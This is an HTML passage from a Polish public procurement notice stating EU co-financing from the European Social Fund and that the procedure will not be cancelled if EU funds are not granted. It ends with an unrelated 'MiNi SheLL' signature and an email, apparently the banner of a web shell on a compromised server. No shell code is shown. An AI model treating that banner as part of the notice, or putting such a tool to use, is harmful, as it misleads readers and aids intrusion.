<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup współfinansowany przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach Pomocy Technicznej Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com